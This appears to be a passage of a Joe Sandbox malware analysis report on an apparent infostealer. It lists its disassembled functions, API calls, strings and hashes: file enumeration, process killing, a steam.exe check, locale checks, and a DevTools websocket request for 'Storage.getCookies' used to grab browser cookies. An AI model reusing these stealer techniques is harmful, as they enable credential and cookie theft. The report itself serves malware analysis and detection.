                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                                • Instruction ID: 5737fab87e288639b21e9913ed7c4f5dd0ff5b97deeecd36162b685fba19c784
                                • Opcode Fuzzy Hash: 990c210252e26c2293214c1ec2f90069b02456abb9d025d3dcd3c3261900f891
                                • Instruction Fuzzy Hash: 86614E72910609AFCB21EB64DC89EEE77B9FF58300F0045A8F546A7251DF34AA58DB90
                                Function 003AD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 003AD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 003AD564
                                • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003AD584
                                • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003AD59E
                                • lstrcat.KERNEL32(?,00F7FBD0), ref: 003AD5E3
                                • lstrcat.KERNEL32(?,00F7FC60), ref: 003AD5F7
                                • lstrcat.KERNEL32(?,?), ref: 003AD60B
                                • lstrcat.KERNEL32(?,?), ref: 003AD61C
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AD62E
                                • lstrcat.KERNEL32(?,?), ref: 003AD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 003AD737
                                • FindClose.KERNEL32(00000000), ref: 003AD746
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                                • Instruction ID: 12755d3efac3abd4d4d37ebce8a4c408e732f629df63507a7111e641435574bc
                                • Opcode Fuzzy Hash: ca1b9e376f347caa494af468f97ff23b9ce58772bbd637ff55ccad693a95d6b3
                                • Instruction Fuzzy Hash: 47617371910519AFCF25EF74DC88EEE77B8EF59300F0044A8E54AA7251DB34AA58CF90
                                Function 003B48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: 844c3a0b74644142bc43e96734da3b586a5f52b2675c47a07774abbfa9f12a03
                                • Instruction ID: cd75f3fb9b28344132ac1c0177d9001b40412858872dfef2940477774b9e3cee
                                • Opcode Fuzzy Hash: 844c3a0b74644142bc43e96734da3b586a5f52b2675c47a07774abbfa9f12a03
                                • Instruction Fuzzy Hash: C8A26A71E012699FDF21DFA8C8807EDBBB6BF48304F1485A9D609A7641DB705E85CF90
                                Function 003A23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                                • lstrlen.KERNEL32(\*.*), ref: 003A240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                                • Instruction ID: d0d1bb37d2db5da67252bab9e29f87a40fe6bd287551079b58b8257e883a8058
                                • Opcode Fuzzy Hash: b3a7832161047b1fcb10a21110b0e79d5b36212d01f8ae2f4f41f02df0d6c42a
                                • Instruction Fuzzy Hash: 67415E32512A19ABCF33EF29DC8AE9F77A4EF15304F055164F84A9B252CF349C158B94
                                Function 003B46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003B46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 003B46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B4711
                                • CloseHandle.KERNEL32(00000000), ref: 003B4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B4726
                                • CloseHandle.KERNEL32(00000000), ref: 003B4731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                                • Instruction ID: 79a5a39ab2ce0c030aa0bc7451dce82cbbb166c1dc8a4cf046e71d9ba3f09038
                                • Opcode Fuzzy Hash: a40d5d74709caf1f523850a598a16bd833d6ce8371eb256d31269c9d8bb1d28a
                                • Instruction Fuzzy Hash: 0501D232601524AFE7215B60DC8DFFA377CEB99B05F000088FA05E1180EF749989EBA5
                                Function 003B4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 003B4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 003B4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B4672
                                • CloseHandle.KERNEL32(00000000), ref: 003B467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                                • Instruction ID: 2a92ac13eb28b8f28aa40ea42f99a3f79736704df8ff0f8606328744c85784f0
                                • Opcode Fuzzy Hash: 736069d192670cbf737aec108af9b598e4a2c846c2dba3a88f6ba5d3cd72a29e
                                • Instruction Fuzzy Hash: 1701AD716015289FD721AB60AC4DFEA77BCEF19350F0001D9EE08E1040EF74DA989BE5
                                Function 003A4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 003A4B7F
                                • lstrlen.KERNEL32(003C4CA8), ref: 003A4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BA7
                                • lstrcat.KERNEL32(00000000,003C4CA8), ref: 003A4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 003A4BFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                                • Instruction ID: 1127d08028988e992b2430a66cf1cb3ae6066d4a37be7743382af08208bddbda
                                • Opcode Fuzzy Hash: 8b71c0e76cadf0997c533d2a3e35cb773cb73e465d9e9732d4b67d34ea55d263
                                • Instruction Fuzzy Hash: 5E311B32522916ABCB23EF64EC8AE9F77A5AF91700F051124F8459B251CB70DC158BA4
                                Function 003B2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B2DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 003B2DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003B2DEC
                                • LocalFree.KERNEL32(00000000), ref: 003B2FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 77cbe64be01b4c2c11a782e279307be360d98e4843327a5bda5abecfca49a93c
                                • Instruction ID: a05851bb9ee65e48b05a621ae6aef9e5c3abed66fc6751a6f87950e773615f83
                                • Opcode Fuzzy Hash: 77cbe64be01b4c2c11a782e279307be360d98e4843327a5bda5abecfca49a93c
                                • Instruction Fuzzy Hash: 4FB1F870900614CFC716CF59C988BA6B7F1FF44318F2AC2A9D5099B6A2D776DD86CB80
                                Function 00742D28 Relevance: 10.3, Strings: 7, Instructions: 1577COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -Ztm$E/$W8w~$eI|S$e]w+$_?$_?
                                • API String ID: 0-682721128
                                • Opcode ID: 60fefdb01ba53f347ab81a4a9df1b43e51bf9fbfa5d4572b3f7cfb71ca648631
                                • Instruction ID: d86899546d01ca9c724b0d572cff2305e9200a53fe96e5b4e663d08a91337cb4
                                • Opcode Fuzzy Hash: 60fefdb01ba53f347ab81a4a9df1b43e51bf9fbfa5d4572b3f7cfb71ca648631
                                • Instruction Fuzzy Hash: 9EB2E5F3A0C204AFE304AE2DEC4577ABBE5EF94720F1A492DE6C4C3744E63598458696
                                Function 00746ABE Relevance: 9.7, Strings: 7, Instructions: 971COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ~\<$ES?$I\s}$S?_$S?_$S?_$]&s<
                                • API String ID: 0-935120390
                                • Opcode ID: 2331ecaeea34bc5cd0eea806dca3d79d1107b7c30c16b9087d0ff7cf9ac07d1c
                                • Instruction ID: 98df6a3529b264b4eb7d00a40e87a6a09e10728b1f07a8f0c55f71b3c9875dec
                                • Opcode Fuzzy Hash: 2331ecaeea34bc5cd0eea806dca3d79d1107b7c30c16b9087d0ff7cf9ac07d1c
                                • Instruction Fuzzy Hash: ED5209F360C200AFE3086E2DEC8567AB7D9EF94720F1A453DEAC5C3744EA3598158796
                                Function 0073C2A5 Relevance: 9.1, Strings: 6, Instructions: 1623COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
